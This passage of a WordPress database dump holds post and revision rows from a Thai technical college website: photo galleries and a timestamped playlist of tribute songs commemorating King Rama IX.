จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n<img class=\"aligncenter size-large wp-image-4459\" src=\"/wp-content/uploads/2018/11/87-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หน่วยแพทย์และพยาบาลตั้งจุดให้บริการครอบคลุมทั้งพื้นที่ท้องสนามหลวงและโดยรอบพระบรมมหาราชวัง เพื่อคอยดูแลสุขภาพของประชาชนที่เดินทางมารอเข้าถวายสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ พระที่นั่งดุสิตมหาปราสาท</p>\r\n<img class=\"aligncenter size-large wp-image-4460\" src=\"/wp-content/uploads/2018/11/96-Bundit-Chotsuwan-copy-1024x697.jpg\" alt=\"\" width=\"640\" height=\"436\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบพ่อครั้งสุดท้าย”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4461\" src=\"/wp-content/uploads/2018/11/97-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4462\" src=\"/wp-content/uploads/2018/11/100-Bundit-Chotsuwan-copy-1024x712.jpg\" alt=\"\" width=\"640\" height=\"445\" />', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-revision-v1', '', '', '2018-11-13 14:07:10', '2018-11-13 07:07:10', '', 4426, 'http://www.technicrayong.ac.th/4426-revision-v1/', 0, 'revision', '', 0),
(4471, 3, '2018-11-13 14:08:10', '2018-11-13 07:08:10', 'https://youtu.be/xrNi-56jrzQ\r\n<h2><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h2>\r\n<h3><span style=\"color: #003300;\"><a style=\"color: #003300;\" href=\"/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a></span></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/ภาพถ่าย-โดย-บัณฑิต-โชติส\"><span style=\"color: #003300;\">ภาพถ่าย โดย บัณฑิต โชติสุวรรณ</span></a></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย จันทร์กลาง กันทอง</span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงชัย คงเมือง</span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงฤทธิ์ คงเมือง</span></h3>', '๑๐๐ วัน ร้อยเรื่อง เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-revision-v1', '', '', '2018-11-13 14:08:10', '2018-11-13 07:08:10', '', 3805, 'http://www.technicrayong.ac.th/3805-revision-v1/', 0, 'revision', '', 0),
(4472, 3, '2018-11-14 09:30:40', '2018-11-14 02:30:40', 'https://youtu.be/xrNi-56jrzQ\r\n\r\nhttps://www.youtube.com/watch?v=QO9X6zaqiWA\r\n<h2><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h2>\r\n<h3><span style=\"color: #003300;\"><a style=\"color: #003300;\" href=\"/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a></span></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-บัณฑิต-โชติส\"><span style=\"color: #003300;\">ภาพถ่าย โดย บัณฑิต โชติสุวรรณ</span></a></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย จันทร์กลาง กันทอง</span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงชัย คงเมือง</span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงฤทธิ์ คงเมือง</span></h3>', '๑๐๐ วัน ร้อยเรื่อง เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-revision-v1', '', '', '2018-11-14 09:30:40', '2018-11-14 02:30:40', '', 3805, 'http://www.technicrayong.ac.th/3805-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4473, 3, '2018-11-14 11:24:39', '2018-11-14 04:24:39', '[embed]https://youtu.be/4C77KiTi1ag[/embed]\r\n<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\r\n<ol>\r\n <li>13ตุลา-หนุ่ย <em><span style=\"color: #ff0000;\">00:01</span></em></li>\r\n <li>Airborne - บทเพลงถึงพ่อ <em><span style=\"color: #ff0000;\">04:11</span></em></li>\r\n <li>black sheep-lecture building <em><span style=\"color: #ff0000;\">08:32</span></em></li>\r\n <li>Blossoms Blooming-Secret Sessions <span style=\"color: #ff0000;\"><em>10:46</em></span></li>\r\n <li>inner happiness-mama say yes <em><span style=\"color: #ff0000;\">17:54</span></em></li>\r\n <li>Long live in my heart - Deep O Seas <em><span style=\"color: #ff0000;\">20:41</span></em></li>\r\n <li>OH Pra Keun Srung -Kru Pum Final <em><span style=\"color: #ff0000;\">25:25</span></em></li>\r\n <li>Rapbit Dolls - นักวิทยาศาสตร์โลกล้านปี <em><span style=\"color: #ff0000;\">29:26</span></em></li>\r\n <li>Run - My Daddy is BEST ft. p-hot <em><span style=\"color: #ff0000;\">34:11</span></em></li>\r\n <li>Time will tell - หัวใจพ่อ<em><span style=\"color: #ff0000;\"> 37:57</span></em></li>\r\n <li>walk like dad-Stereogram <em><span style=\"color: #ff0000;\">42:45</span></em></li>\r\n <li>Yellow Duck! - Paul <em><span style=\"color: #ff0000;\">46:06</span></em></li>\r\n <li>ขอให้พ่อได้คลายกังวล-white whisky <em><span style=\"color: #ff0000;\">48:30</span></em></li>\r\n <li>คำของพ่อ<em><span style=\"color: #ff0000;\"> 53:55</span></em></li>\r\n <li>คำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส<em><span style=\"color: #ff0000;\"> 57:39</span></em></li>\r\n <li>คำสอนจากพ่อ-หนึ่ง ตีสิบ <em><span style=\"color: #ff0000;\">01:02:45</span></em></li>\r\n <li>คิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย <em><span style=\"color: #ff0000;\">01:07:40</span></em></li>\r\n <li>คิดถึงพ่อ-Bluedock Final <em><span style=\"color: #ff0000;\">01:12:08</span></em></li>\r\n <li>จงเป็นหนึ่งเดียว<em><span style=\"color: #ff0000;\"> 01:15:41</span></em></li>\r\n <li>จากใต้ฝ่าละอองธุลี - พงษ์ บาติก <em><span style=\"color: #ff0000;\">01:18:13</span></em></li>\r\n <li>ใจบริสุทธิ์-Never mind <em><span style=\"color: #ff0000;\">01:22:16</span></em></li>\r\n <li>แด่รัชกาลที่ ๙ - MYDAY <em><span style=\"color: #ff0000;\">01:26:11</span></em></li>\r\n <li>ตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ <em><span style=\"color: #ff0000;\">01:30:13</span></em></li>\r\n <li>ท่านที่เรารัก-สารฑูร กฤตติกากุล <em><span style=\"color: #ff0000;\">1:36:06</span></em></li>\r\n <li>เทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber<em><span style=\"color: #ff0000;\"> 01:42:52</span></em></li>\r\n <li>แทนคุณแผ่นดิน-นักดนตรีมุมตึก <em><span style=\"color: #ff0000;\">01:46:51</span></em></li>\r\n <li>ไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่ <em><span style=\"color: #ff0000;\">01:49:52</span></em></li>\r\n <li>ปฏิญาณ-Weekend Rocker <em><span style=\"color: #ff0000;\">01:53:32</span></em></li>\r\n <li>ปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์ <em><span style=\"color: #ff0000;\">01:57:56</span></em></li>\r\n <li>ฝันบิดา-ชาติ สุชาติ <em><span style=\"color: #ff0000;\">02:04:10</span></em></li>\r\n <li>ฝึกใจ(Song - for king)-The Catwalk <em><span style=\"color: #ff0000;\">02:08:55</span></em></li>\r\n <li>พ่อบนฟ้า-เดอะ คุโรบูตะ <em><span style=\"color: #ff0000;\">02:13:20</span></em></li>\r\n <li>พ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร) <em><span style=\"color: #ff0000;\">02:15:40</span></em></li>\r\n <li>พอมีพอกิน-Kee Khumsaeng <em><span style=\"color: #ff0000;\">02:21:01</span></em></li>\r\n <li>พ่อหลวงของปวงชนฯ-เฟรนด์อาบี <em><span style=\"color: #ff0000;\">02:25:06</span></em></li>\r\n <li>พ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน <em><span style=\"color: #ff0000;\">02:30:13</span></em></li>\r\n <li>พ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์ <em><span style=\"color: #ff0000;\">02:36:09</span></em></li>\r\n <li>เพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ <em><span style=\"color: #ff0000;\">02:41:02</span></em></li>\r\n <li>เพลงของพ่อ-วรัตถ์ชัย <em><span style=\"color: #ff0000;\">02:45:56</span></em></li>\r\n <li>เพลงคือราชา พงษ์ บาติก <em><span style=\"color: #ff0000;\">02:51:03</span></em></li>\r\n <li>ภาพที่เคยมีพ่อ-รวมศิลปินดงงู <em><span style=\"color: #ff0000;\">02:54:53</span></em></li>\r\n <li>ภาพในหัวใจ - รวมศิลปิน <em><span style=\"color: #ff0000;\">02:58:51</span></em></li>\r\n <li>มองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon <em><span style=\"color: #ff0000;\">03:04:12</span></em></li>\r\n <li>มิใช่อ่อนแออ-สมัยไหนนิยม <em><span style=\"color: #ff0000;\">03:08:01</span></em></li>\r\n <li>เมื่อพ่อกลับไปบนฟ้า<em><span style=\"color: #ff0000;\"> 03:12:20</span></em></li>\r\n <li>ยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio <em><span style=\"color: #ff0000;\">03:15:59</span></em></li>\r\n <li>รอยเท้า ที่พ่อเดิน-พลายงาม<span style=\"color: #ff0000;\"><em> 03:19:26</em></span></li>\r\n <li>รอยเท้าพ่อ-ใบไม้สีแดง <span style=\"color: #ff0000;\"><em>03:23:45</em></span></li>\r\n <li>ระหว่างทาง -Black Tree <em><span style=\"color: #ff0000;\">03:27:17</span></em></li>\r\n <li>รักพ่อ - BAD DNA <em><span style=\"color: #ff0000;\">03:32:18</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn<em><span style=\"color: #ff0000;\"> 03:35:47</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน <span style=\"color: #ff0000;\"><em>03:39:18</em></span></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา <em><span style=\"color: #ff0000;\">03:43:19</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต <em><span style=\"color: #ff0000;\">03:47:33</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว <em><span style=\"color: #ff0000;\">03:49:59</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน <em><span style=\"color: #ff0000;\">03:53:55</span></em></li>\r\n <li>ศรัทธา-Past of the pain <em><span style=\"color: #ff0000;\">03:56:52</span></em></li>\r\n <li>สมัยไหนนิยม เพลง มิใช่อ่อนแอ <em><span style=\"color: #ff0000;\">04:03:32</span></em></li>\r\n <li>สัตว์ป่า - BABYLON BK <em><span style=\"color: #ff0000;\">04:07:50</span></em></li>\r\n <li>สิงโต นำโชค - รักเพื่อพ่อ <em><span style=\"color: #ff0000;\">04:09:39</span></em></li>\r\n <li>สุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต <em><span style=\"color: #ff0000;\">04:12:52</span></em></li>\r\n <li>หน้าที่ของตน-หนึ่ง smile buffalo <em><span style=\"color: #ff0000;\">04:15:34</span></em></li>\r\n <li>ห่างไกล ใจยังห่วง-CobraK <em><span style=\"color: #ff0000;\">04:20:07</span></em></li>\r\n <li>ให้คงอยู่-Sao Moonlight Gypsy <em><span style=\"color: #ff0000;\">04:22:13</span></em></li>\r\n <li>อยากให้พ่อกลับมา-นายเสียง ประตูเปิด <em><span style=\"color: #ff0000;\">04:25:57</span></em></li>\r\n <li>โอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari <em><span style=\"color: #ff0000;\">04:29:55</span></em></li>\r\n <li>โอ้พระคืนสรวง-CU Chorus <em><span style=\"color: #ff0000;\">04:33:32</span></em></li>\r\n</ol>', '\"แต่งเพลงเพื่อพ่อ\"', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%95%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%9e%e0%b8%a5%e0%b8%87%e0%b9%80%e0%b8%9e%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9e%e0%b9%88%e0%b8%ad', '', '', '2018-11-15 10:29:50', '2018-11-15 03:29:50', '', 0, 'http://www.technicrayong.ac.th/?page_id=4473', 0, 'page', '', 0),
(4474, 3, '2018-11-14 11:24:39', '2018-11-14 04:24:39', '<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\r\n13ตุลา-หนุ่ย\r\n\r\nAirborne - บทเพลงถึงพ่อ\r\n\r\nblack sheep-lecture building\r\n\r\nBlossoms Blooming-Secret Sessions\r\n\r\ninner happiness-mama say yes\r\n\r\nLong live in my heart - Deep O Seas\r\n\r\nOH Pra Keun Srung -Kru Pum Final\r\n\r\nRapbit Dolls - นักวิทยาศาสตร์โลกล้านปี\r\n\r\nRun - My Daddy is BEST ft. p-hot\r\n\r\nTime will tell - หัวใจพ่อ\r\n\r\nwalk like dad-Stereogram\r\n\r\nYellow Duck! - Paul\r\n\r\nขอให้พ่อได้คลายกังวล-white whisky\r\n\r\nคำของพ่อ\r\n\r\nคำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส\r\n\r\nคำสอนจากพ่อ-หนึ่ง ตีสิบ\r\n\r\nคิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย\r\n\r\nคิดถึงพ่อ-Bluedock Final\r\n\r\nจงเป็นหนึ่งเดียว\r\n\r\nจากใต้ฝ่าละอองธุลี - พงษ์ บาติก\r\n\r\nใจบริสุทธิ์-Never mind\r\n\r\nแด่รัชกาลที่ ๙ - MYDAY\r\n\r\nตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ\r\n\r\nท่านที่เรารัก-สารฑูร กฤตติกากุล\r\n\r\nเทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber\r\n\r\nแทนคุณแผ่นดิน-นักดนตรีมุมตึก\r\n\r\nไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่\r\n\r\nปฏิญาณ-Weekend Rocker\r\n\r\nปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์\r\n\r\nฝันบิดา-ชาติ สุชาติ\r\n\r\nฝึกใจ(Song - for king)-The Catwalk\r\n\r\nพ่อบนฟ้า-เดอะ คุโรบูตะ\r\n\r\nพ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร)\r\n\r\nพอมีพอกิน-Kee Khumsaeng\r\n\r\nพ่อหลวงของปวงชนฯ-เฟรนด์อาบี\r\n\r\nพ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน\r\n\r\nพ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์\r\n\r\nเพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ\r\n\r\nเพลงของพ่อ-วรัตถ์ชัย\r\n\r\nเพลงคือราชา พงษ์ บาติก\r\n\r\nภาพที่เคยมีพ่อ-รวมศิลปินดงงู\r\n\r\nภาพในหัวใจ - รวมศิลปิน\r\n\r\nมองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon\r\n\r\nมิใช่อ่อนแออ-สมัยไหนนิยม\r\n\r\nเมื่อพ่อกลับไปบนฟ้า\r\n\r\nยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio\r\n\r\nรอยเท้า ที่พ่อเดิน-พลายงาม\r\n\r\nรอยเท้าพ่อ-ใบไม้สีแดง\r\n\r\nระหว่างทาง -Black Tree\r\n\r\nรักพ่อ - BAD DNA\r\n\r\nเรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn\r\n\r\nเรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน\r\n\r\nเรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา\r\n\r\nเรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต\r\n\r\nเรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว\r\n\r\nเรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน\r\n\r\nศรัทธา-Past of the pain\r\n\r\nสมัยไหนนิยม เพลง มิใช่อ่อนแออ\r\n\r\nสัตว์ป่า - BABYLON BK\r\n\r\nสิงโต นำโชค - รักเพื่อพ่อ\r\n\r\nสุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต\r\n\r\nหน้าที่ของตน-หนึ่ง smile buffalo\r\n\r\nห่างไกล ใจยังห่วง-CobraK\r\n\r\nให้คงอยู่-Sao Moonlight Gypsy\r\n\r\nอยากให้พ่อกลับมา-นายเสียง ประตูเปิด\r\n\r\nโอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari\r\n\r\nโอ้พระคืนสรวง-CU Chorus', '\"แต่งเพลงเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4473-revision-v1', '', '', '2018-11-14 11:24:39', '2018-11-14 04:24:39', '', 4473, 'http://www.technicrayong.ac.th/4473-revision-v1/', 0, 'revision', '', 0),
(4475, 3, '2018-11-14 11:25:49', '2018-11-14 04:25:49', '<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\r\n<ol>\r\n <li>13ตุลา-หนุ่ย</li>\r\n <li>Airborne - บทเพลงถึงพ่อ</li>\r\n <li>black sheep-lecture building</li>\r\n <li>Blossoms Blooming-Secret Sessions</li>\r\n <li>inner happiness-mama say yes</li>\r\n <li>Long live in my heart - Deep O Seas</li>\r\n <li>OH Pra Keun Srung -Kru Pum Final</li>\r\n <li>Rapbit Dolls - นักวิทยาศาสตร์โลกล้านปี</li>\r\n <li>Run - My Daddy is BEST ft. p-hot</li>\r\n <li>Time will tell - หัวใจพ่อ</li>\r\n <li>walk like dad-Stereogram</li>\r\n <li>Yellow Duck! - Paul</li>\r\n <li>ขอให้พ่อได้คลายกังวล-white whisky</li>\r\n <li>คำของพ่อ</li>\r\n <li>คำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส</li>\r\n <li>คำสอนจากพ่อ-หนึ่ง ตีสิบ</li>\r\n <li>คิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย</li>\r\n <li>คิดถึงพ่อ-Bluedock Final</li>\r\n <li>จงเป็นหนึ่งเดียว</li>\r\n <li>จากใต้ฝ่าละอองธุลี - พงษ์ บาติก</li>\r\n <li>ใจบริสุทธิ์-Never mind</li>\r\n <li>แด่รัชกาลที่ ๙ - MYDAY</li>\r\n <li>ตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ</li>\r\n <li>ท่านที่เรารัก-สารฑูร กฤตติกากุล</li>\r\n <li>เทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber</li>\r\n <li>แทนคุณแผ่นดิน-นักดนตรีมุมตึก</li>\r\n <li>ไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่</li>\r\n <li>ปฏิญาณ-Weekend Rocker</li>\r\n <li>ปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์</li>\r\n <li>ฝันบิดา-ชาติ สุชาติ</li>\r\n <li>ฝึกใจ(Song - for king)-The Catwalk</li>\r\n <li>พ่อบนฟ้า-เดอะ คุโรบูตะ</li>\r\n <li>พ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร)</li>\r\n <li>พอมีพอกิน-Kee Khumsaeng</li>\r\n <li>พ่อหลวงของปวงชนฯ-เฟรนด์อาบี</li>\r\n <li>พ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน</li>\r\n <li>พ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์</li>\r\n <li>เพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ</li>\r\n <li>เพลงของพ่อ-วรัตถ์ชัย</li>\r\n <li>เพลงคือราชา พงษ์ บาติก</li>\r\n <li>ภาพที่เคยมีพ่อ-รวมศิลปินดงงู</li>\r\n <li>ภาพในหัวใจ - รวมศิลปิน</li>\r\n <li>มองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon</li>\r\n <li>มิใช่อ่อนแออ-สมัยไหนนิยม</li>\r\n <li>เมื่อพ่อกลับไปบนฟ้า</li>\r\n <li>ยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio</li>\r\n <li>รอยเท้า ที่พ่อเดิน-พลายงาม</li>\r\n <li>รอยเท้าพ่อ-ใบไม้สีแดง</li>\r\n <li>ระหว่างทาง -Black Tree</li>\r\n <li>รักพ่อ - BAD DNA</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว</li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน</li>\r\n <li>ศรัทธา-Past of the pain</li>\r\n <li>สมัยไหนนิยม เพลง มิใช่อ่อนแออ</li>\r\n <li>สัตว์ป่า - BABYLON BK</li>\r\n <li>สิงโต นำโชค - รักเพื่อพ่อ</li>\r\n <li>สุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต</li>\r\n <li>หน้าที่ของตน-หนึ่ง smile buffalo</li>\r\n <li>ห่างไกล ใจยังห่วง-CobraK</li>\r\n <li>ให้คงอยู่-Sao Moonlight Gypsy</li>\r\n <li>อยากให้พ่อกลับมา-นายเสียง ประตูเปิด</li>\r\n <li>โอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari</li>\r\n <li>โอ้พระคืนสรวง-CU Chorus</li>\r\n</ol>', '\"แต่งเพลงเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4473-revision-v1', '', '', '2018-11-14 11:25:49', '2018-11-14 04:25:49', '', 4473, 'http://www.technicrayong.ac.th/4473-revision-v1/', 0, 'revision', '', 0),
(4476, 3, '2018-11-15 10:29:02', '2018-11-15 03:29:02', '[embed]https://youtu.be/4C77KiTi1ag[/embed]\n<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\n<ol>\n <li>13ตุลา-หนุ่ย <em><span style=\"color: #ff0000;\">00:01</span></em></li>\n <li>Airborne - บทเพลงถึงพ่อ <em><span style=\"color: #ff0000;\">04:11</span></em></li>\n <li>black sheep-lecture building <em><span style=\"color: #ff0000;\">08:32</span></em></li>\n <li>Blossoms Blooming-Secret Sessions <span style=\"color: #ff0000;\"><em>10:46</em></span></li>\n <li>inner happiness-mama say yes <em><span style=\"color: #ff0000;\">17:54</span></em></li>\n <li>Long live in my heart - Deep O Seas <em><span style=\"color: #ff0000;\">20:41</span></em></li>\n <li>OH Pra Keun Srung -Kru Pum Final <em><span style=\"color: #ff0000;\">25:25</span></em></li>\n <li>Rapbit Dolls - นักวิทยาศาสตร์โลกล้านปี <em><span style=\"color: #ff0000;\">29:26</span></em></li>\n <li>Run - My Daddy is BEST ft. p-hot <em><span style=\"color: #ff0000;\">34:11</span></em></li>\n <li>Time will tell - หัวใจพ่อ<em><span style=\"color: #ff0000;\"> 37:57</span></em></li>\n <li>walk like dad-Stereogram <em><span style=\"color: #ff0000;\">42:45</span></em></li>\n <li>Yellow Duck! - Paul <em><span style=\"color: #ff0000;\">46:06</span></em></li>\n <li>ขอให้พ่อได้คลายกังวล-white whisky <em><span style=\"color: #ff0000;\">48:30</span></em></li>\n <li>คำของพ่อ<em><span style=\"color: #ff0000;\"> 53:55</span></em></li>\n <li>คำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส<em><span style=\"color: #ff0000;\"> 57:39</span></em></li>\n <li>คำสอนจากพ่อ-หนึ่ง ตีสิบ <em><span style=\"color: #ff0000;\">01:02:45</span></em></li>\n <li>คิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย <em><span style=\"color: #ff0000;\">01:07:40</span></em></li>\n <li>คิดถึงพ่อ-Bluedock Final <em><span style=\"color: #ff0000;\">01:12:08</span></em></li>\n <li>จงเป็นหนึ่งเดียว<em><span style=\"color: #ff0000;\"> 01:15:41</span></em></li>\n <li>จากใต้ฝ่าละอองธุลี - พงษ์ บาติก <em><span style=\"color: #ff0000;\">01:18:13</span></em></li>\n <li>ใจบริสุทธิ์-Never mind <em><span style=\"color: #ff0000;\">01:22:16</span></em></li>\n <li>แด่รัชกาลที่ ๙ - MYDAY <em><span style=\"color: #ff0000;\">01:26:11</span></em></li>\n <li>ตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ <em><span style=\"color: #ff0000;\">01:30:13</span></em></li>\n <li>ท่านที่เรารัก-สารฑูร กฤตติกากุล <em><span style=\"color: #ff0000;\">1:36:06</span></em></li>\n <li>เทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber<em><span style=\"color: #ff0000;\"> 01:42:52</span></em></li>\n <li>แทนคุณแผ่นดิน-นักดนตรีมุมตึก <em><span style=\"color: #ff0000;\">01:46:51</span></em></li>\n <li>ไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่ <em><span style=\"color: #ff0000;\">01:49:52</span></em></li>\n <li>ปฏิญาณ-Weekend Rocker <em><span style=\"color: #ff0000;\">01:53:32</span></em></li>\n <li>ปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์ <em><span style=\"color: #ff0000;\">01:57:56</span></em></li>\n <li>ฝันบิดา-ชาติ สุชาติ <em><span style=\"color: #ff0000;\">02:04:10</span></em></li>\n <li>ฝึกใจ(Song - for king)-The Catwalk <em><span style=\"color: #ff0000;\">02:08:55</span></em></li>\n <li>พ่อบนฟ้า-เดอะ คุโรบูตะ <em><span style=\"color: #ff0000;\">02:13:20</span></em></li>\n <li>พ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร) <em><span style=\"color: #ff0000;\">02:15:40</span></em></li>\n <li>พอมีพอกิน-Kee Khumsaeng <em><span style=\"color: #ff0000;\">02:21:01</span></em></li>\n <li>พ่อหลวงของปวงชนฯ-เฟรนด์อาบี <em><span style=\"color: #ff0000;\">02:25:06</span></em></li>\n <li>พ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน <em><span style=\"color: #ff0000;\">02:30:13</span></em></li>\n <li>พ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์ <em><span style=\"color: #ff0000;\">02:36:09</span></em></li>\n <li>เพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ <em><span style=\"color: #ff0000;\">02:41:02</span></em></li>\n <li>เพลงของพ่อ-วรัตถ์ชัย <em><span style=\"color: #ff0000;\">02:45:56</span></em></li>\n <li>เพลงคือราชา พงษ์ บาติก <em><span style=\"color: #ff0000;\">02:51:03</span></em></li>\n <li>ภาพที่เคยมีพ่อ-รวมศิลปินดงงู <em><span style=\"color: #ff0000;\">02:54:53</span></em></li>\n <li>ภาพในหัวใจ - รวมศิลปิน <em><span style=\"color: #ff0000;\">02:58:51</span></em></li>\n <li>มองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon <em><span style=\"color: #ff0000;\">03:04:12</span></em></li>\n <li>มิใช่อ่อนแออ-สมัยไหนนิยม <em><span style=\"color: #ff0000;\">03:08:01</span></em></li>\n <li>เมื่อพ่อกลับไปบนฟ้า<em><span style=\"color: #ff0000;\"> 03:12:20</span></em></li>\n <li>ยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio <em><span style=\"color: #ff0000;\">03:15:59</span></em></li>\n 